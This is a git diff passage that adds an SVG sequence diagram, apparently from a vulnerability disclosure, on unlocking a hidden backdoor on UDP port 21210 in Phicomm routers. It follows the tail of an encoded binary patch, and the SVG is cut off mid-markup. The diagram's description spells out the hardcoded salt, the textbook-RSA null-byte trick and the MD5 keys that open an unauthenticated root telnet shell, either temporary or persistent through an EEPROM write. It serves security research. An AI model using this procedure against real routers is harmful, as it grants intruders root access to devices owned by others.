z+V3;3dbDY<*bTj=XL;Tp8f!ZA^!I@EnM*SZl0M}e-OWwrt1o+Ruegyu0kPM1vp%2v
zY^M)Z)6T!S;m};HmXADW<kZ>3E1I;+{a&6gOkLv#*Yj5)!{SDH?1c>h;5-}bcmqN&
zB!8j?3;6G00iesCSejl8&!X`TP2wlYhBv^@-afRgtqsDAjw4rBx5QV^MSpiiRHS^!
zc*7vo()ze>O;<^vIR^M8kNC_3z3pjqlGl!t<uuy;QLH!73YW3esZ0*n79fRhMGNbU
zqNn6c+xBX#ZFNcTX3rMhI<OW<j6;;1+sYwL6TogTKkB6tFaviDtrZp@xYd;hjr5-D
zH*QoMQyIe?EZ35S=#y=gvSJxkJ<e<OC}4?Jn9#!jS69N?&=O;t5Ddj)r5!#Z_w0tz
z_Yx`sP{T0ET7)&HB`x;A<q)A{AtpLxhT(AE^)P;I{-@=Cw9mxPkM0MDoDI+(d+=mb
zR21xR?qmb6AOE<y67`?7tuo`dDTp{X$i{Z#Y{@?OuC$;tr`ifKJOyn1j_&Rg@b=u>
z>@)IoTHRYL{%o+xkYQ?=9I8`~9Il;%8F*0mxE(rtSRIR2FLsqI2AD4-E9Qg2wlFHh
zGmjiJbfga4?ypxXS>Nz&6nv`&N_i8{-U<bjJ3|j`*Yko_xm@@LXAd$#O&uv=x3_+S
zeM9C)K14P^c8T>RDOWP~wQBGU_CgB^n{BqI<36J+O&tg@Q0U~YpC5U4u?0k0WJ8=m
z2$xsK#%=imJ*s^V6>H0Pl#Dz#Dm=8;<nZ%tWRoy-b#+Y~E9PdSqMoL*<DLlCFlliN
z<7q+%d?fYt^_alu^!i}g97kYR(_WoWr|m>iIQEXqhY4X>Ild+tcutgzF;B@*g?x?2
z?Qvm`&TOM1H%I6Wm3Hph)f%v9%;Gf&xn8uRwZD^h!&{S`anO>7$tnV})|sU)h@0vA
zE!VBL1)G@5`%8ekyp7i6P^F6WSyoRN1}eL}LmjU*pPw9Sznoip0GX}hE?!E%IF+42
zp{TZzgT!g@Majg<bLY+_-Mp!UmAtj*1LsHFlYoSD#d;tBbFo=WJ749?CtyH17QLNk
z>%wLxK>8e>W9MRH$@tLLLOIGOO&SlALh*gb&S2ptLV~4>?XJ}UF(Xg)_F48jYkpib
zw!s(Bf6D6zZ`M|<d||?iKC{8tQPIn7bPl<?Rsz9q37T(qX^>|czwM7rLq0uG>!&ZF
zQ25AqQ7EUB{IqB+6kn04|4^1oP{U-XAXDTqrFlG)%vxM|{@aBEC19gFy1Mo=m3|Xm
zXXJbW34Ow#Ace9*_~-XMUr@%bc%x17Z1o%kO@O42l+Y}u#-9B2J&+Ksjkf2n9x<m-
zjxYN8U1$;_>F(jte0U5J(X8P(uEV34tZNw`v_jaKQ{v^i(azlVm6|tAgk6lLQ!K{V
zzF)VUwcmYPYM2~ie4@fnzs+Td|GQWIa_7jp*kYQlzn4N`<JV@W8H)Y1R49~?AE8H#
zI*p=wT9y2V62m*S9wmQ%!W4@7|Mt;czKDC(fRrsx`S9f?-D#A!f<L|WQ@V*9_A>77
z=i7V~O3mW$7nIaHhas^kjtMnUT)SEIF&wUsqkmlAiuHaSKtOttOszwB1YKO$ctn7T
zMYQ0|kE_17ib@~vd+OL4wpzn|bbv*F<zH{R-9DB&ObRqr`c3vXzYZZRHr3rfe#yFy
znMq`0k#kY4?3C(?Q@>n+vR{X-%BZo4>zl(Hk1qDJqy6>6JH}Y*v`YW}zP=`wx|2R*
ztsR}6g8KYq*%xg2dBNC01=FL%Id^&;*5ffj)KD2WCm~>3_g)aql#4CeuumL+e#0f;
zy~@hU8sgOFFEdT#UcC09)9D*)>YhGzzWWeQv6cGcIJwVKC!7D8hj=Lkq3J~p>}rOq
zrYwm3anCe_nIrxE{kJb}A<zDC$B#SS*EC(f<n&RJulj08{CG;=xESLjBO@)RHHCw(
zWESdRr@r-H^5dWDW;4c{&=!C3MiL!WlmA>w<Y?=dmE_$s4=WB|AOGX)@5xd7Js|mS
zy>Lu81T`jEuqM<W7qMc%?@}}Lm%^CevBk5?-h5#YeHMkX`@c`8*7>-jZ#Vo{MpOCq
ze`H<%ePjI}Y^MMJ(m%u6f9S0GH*c^0c0ULpZB846bfp?}3R-!7n7)V^VPK+S>oV5t
zb5+R6)5g&?C88x^rIfqtZ}f@Q<{DwWvD#t>^`89V!OT{lMMEwr5lL5;syp;NM){QM
z+!SxnccO)yV-_t_Nk&@Q;*)1wqI4W9I~(ym3)>%EJ(6+#!f3N-Dxb$>?m+gFu}0gI
zYDbkfeHyPHYzcldh|@GmKFcekFI7H1{#%p&x=kZJ`6nYuYUSRuoI>GuHlC3L*(8oc
zl|GHG#n|R|%0Z=#6=F1iR+#{HoE|HF1P3qUrb(t!@z@7>eCEqnuaYlbw7p*k4kXn;
zs_@n=`vV?bH(qF@8(zL?iclJ%lUjg=)%FKoAl)KAQCN6%r33x}RunIz+A?Ty#-}d8
zLU0{AKbI+M43*9=rb?xfO!rai2~c>X27_bp+$%HZM=KRvyI-Gs^#<vczH}sX49RVI
z=>BuuAf0c~@O{mrUKuOm+7nIWDtDixZ|^akiBmxCis}jzpzcmc_@Qy>H{(DSRJI1y
zF<t-wIrYM_d*sNWh-@G^MKA+@Q(zpyOVL{Y{y!|Srn%!DpyI52S9WYFg83c=;v9nn
z!x3n`yZj8?@ZG%2NgTx=J!_KD;Ljaa(eE!U`=4G?Ts*zbKI`_p4^B#GwPw<jiubNK
zu4r3>M{@!z=DCLyK8!#1lplerPDB`FK!HSpEX9sr0zJ*}0wzmOy>KrYCon~o!G;IC
m>@@isc0=+KZ}89mFs5?j*4@M<<rk^sI<?g|F)}w;`2QD-vG(Ku

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
new file mode 100644
index 0000000..9c61254
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/img/Picking_the_Lock_on_Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1672" height="3333"><desc>title%20Picking%20the%20Lock%20on%20Phicomm's%20Encrypted%20Backdoor%2C%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnTwo%20things%20are%20essential%20here%3A%5Cn%5Cn(1)%20the%20fate%20of%20this%20message%20is%20to%20be%20decrypted%20with%20the%5Cn%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%20and%20then%20**XOR**ed%20with%20a%20%5Cnrandomly%20generated%20secret%20text%2031%20ASCII-printable%5Cnbytes.%5Cn%5Cn(2)%20the%20result%20of%20these%20two%20operations%20will%20then%20be%5Cnconcatenated%20with%20the%20salt%20%3Ccolor%3A%23purple%3E**using%20sprintf%20and%20the%20%25s%5Cnformat%20string**%3C%2Fcolor%3E.%5Cn%5CnIf%20we%20can%20discover%20a%20phony%20ciphertext%20that%2C%20when%20decrypted%20with%5Cn**RSA_public_decrypy()**%2C%20with%20the%20%3Ccolor%3A%23darkblue%3E**HARDCODED%20PUBLIC%20KEY**%3C%2Fcolor%3E%5Cnand%20the%20**RSA_NO_PADDING**%20option%2C%20yields%20a%20bytestring%20that%5Cnbegins%20with%20a%20byte%20between%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7f%3C%2Fcolor%3E%2C%20then%20we%20will%20have%20a%5Cn1%20in%2092%20chance%20of%20tricking%20the%20Server%20into%20generating%20a%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E%5Cnthat%20begins%20with%20a%20**NULL%20BYTE**.%20This%20will%20cause%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%5Cnto%20be%20nothing%20but%20hashes%20of%20their%20respective%20salts.%5Cn%5CnStore%20the%20result%20of%20this%20search%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3AWe%20no%20longer%20need%20to%20be%20able%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%2C%20and%20so%20we%20no%20longer%5Cnhave%20any%20need%20of%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E.%5Cn%5CnWe%20can%20simply%20set%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20to%20the%5Cn**empty%20string**.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn%3Ccolor%3A%23red%3E**Note%20that%20if%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**MASKED_SECRET**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20begins%20with%20a%20null%20byte%2C%5Cnthen%20the%20strings%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_TEMP_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20and%20%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**RAW_PERM_KEY**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20will%5Cnjust%20be%20%3C%2Fcolor%3E%3Ccolor%3A%23darkred%3E%22%2BTEMP%22%3C%2Fcolor%3E%20%3Ccolor%3A%23red%3Eand%3C%2Fcolor%3E%20%3Ccolor%3A%23darkred%3E%22%2BPERM%22%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2C%20respectively!%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsuffixes%20to%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5Cn%3Ccolor%3A%23red%3E**Remember%20that%20we%20have%20set%20%3C%2Fcolor%3E%3Ccolor%3A%23blue%3E**SECRET_PLAINTEXT**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20to%5Cnthe%20empty%20string%2C%20so%20the%20suffix%20is%20all%20we%20need%20to%5Cnknow.%3C%2Fcolor%3E**%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%5Cn%5Cn%3Ccolor%3A%23red%3E**Here%2C%20all%20we%20need%20to%20do%20is%20compute%20the%20MD5%5Cnhash%20of%20%3Ccolor%3A%23darkred%3E%2BTEMP%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%20or%20%3Ccolor%3A%23darkred%3E%2BPERM%3C%2Fcolor%3E%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1672" height="3333"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="22.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="297.366151838796" y="32.04212955" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Picking the Lock on Phicomm's Encrypted Backdoor, on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 125.39153363899999 L 62.80785098743945 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 125.39153363899999 L 905.7354112766808 3333.8767725790003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray="16.431861307692305,7.120473233333333"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 10.68070985 67.715700449 L 114.9349921248789 67.715700449 L 114.9349921248789 125.39153363899999 L 10.68070985 125.39153363899999 L 10.68070985 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="33.8578502245" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 849.7749380774737 67.715700449 L 961.6958844758879 67.715700449 L 961.6958844758879 125.39153363899999 L 849.7749380774737 125.39153363899999 L 849.7749380774737 67.715700449 Z" stroke-miterlimit="10" stroke-width="3.417827152" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="872.9520784519738" y="104.03011393899999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 52.12714113743945 136.072243489 L 73.48856083743945 136.072243489 L 73.48856083743945 3312.515352879 L 52.12714113743945 3312.515352879 L 52.12714113743945 136.072243489" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 895.0547014266808 238.607058049 L 916.4161211266808 238.607058049 L 916.4161211266808 3312.515352879 L 895.0547014266808 3312.515352879 L 895.0547014266808 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 411.634557619 L 927.0968309766807 411.634557619 L 927.0968309766807 514.169372179 L 905.7354112766808 514.169372179 L 905.7354112766808 411.634557619" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 62.80785098743945 1093.063846049 L 84.16927068743945 1093.063846049 L 84.16927068743945 3312.515352879 L 62.80785098743945 3312.515352879 L 62.80785098743945 1093.063846049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 905.7354112766808 1261.819061679 L 927.0968309766807 1261.819061679 L 927.0968309766807 3312.515352879 L 905.7354112766808 3312.515352879 L 905.7354112766808 1261.819061679" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 916.4161211266809 1392.123721849 L 937.7775408266808 1392.123721849 L 937.7775408266808 3312.515352879 L 916.4161211266809 3312.515352879 L 916.4161211266809 1392.123721849" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 927.0968309766808 1565.151221419 L 948.4582506766808 1565.151221419 L 948.4582506766808 3312.515352879 L 927.0968309766808 3312.515352879 L 927.0968309766808 1565.151221419" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 1624.963196579 L 94.84998053743945 1624.963196579 L 94.84998053743945 3312.515352879 L 73.48856083743945 3312.515352879 L 73.48856083743945 1624.963196579" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 84.16927068743945 1949.656776019 L 105.53069038743945 1949.656776019 L 105.53069038743945 3312.515352879 L 84.16927068743945 3312.515352879 L 84.16927068743945 1949.656776019" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 937.7775408266808 2186.7685346890003 L 959.1389605266808 2186.7685346890003 L 959.1389605266808 3312.515352879 L 937.7775408266808 3312.515352879 L 937.7775408266808 2186.7685346890003" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 94.84998053743945 2703.714891429 L 116.21140023743945 2703.714891429 L 116.21140023743945 3312.515352879 L 94.84998053743945 3312.515352879 L 94.84998053743945 2703.714891429" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 105.53069038743945 2876.7423909990002 L 126.89211008743945 2876.7423909990002 L 126.89211008743945 3312.515352879 L 105.53069038743945 3312.515352879 L 105.53069038743945 2876.7423909990002" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 948.4582506766808 2936.5543661590004 L 969.8196703766807 2936.5543661590004 L 969.8196703766807 3312.515352879 L 948.4582506766808 3312.515352879 L 948.4582506766808 2936.5543661590004" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="318.8757539581576" y="168.114373039" width="314.4250913686792" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="189.47579273899998" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="318.8757539581576" y="210.83721243899998" width="330.7917543478052" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="489.47996080964197" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="620.8966325625717" y="187.33965076899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="208.70107046899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="322.0799669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="384.3299669131576" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="638.6632951602279" y="230.06249016899997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 73.48856083743945 238.607058049 L 877.4671325403475 238.607058049" stroke-miterlimit="10" stroke-width="1.7801183083333332" stroke-dasharray=""/><g transform="translate(895.0547014266808,238.607058049) translate(-895.0547014266808,-238.607058049)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 877.2535183433475 229.70646650733332 L 895.0547014266808 238.607058049 L 877.2535183433475 247.50764959066666 Z"/></g></g><g><g><rect fill="white" stroke="none" x="952.3745109550141" y="270.649187599" width="388.8084198064844" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="292.010607299" width="437.85842571926514" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="313.372026999" width="346.8751007146875" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="334.733446699" width="6.408425909999999" height="27.769845609999997"/></g><g><rect fill="white" stroke="none" x="952.3745109550141" y="356.094866399" width="474.5250946111719" height="27.769845609999997"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="289.87446532900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="955.5787239100141" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1119.4620552088422" y="311.23588502900003" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="15pt" font-style="normal" 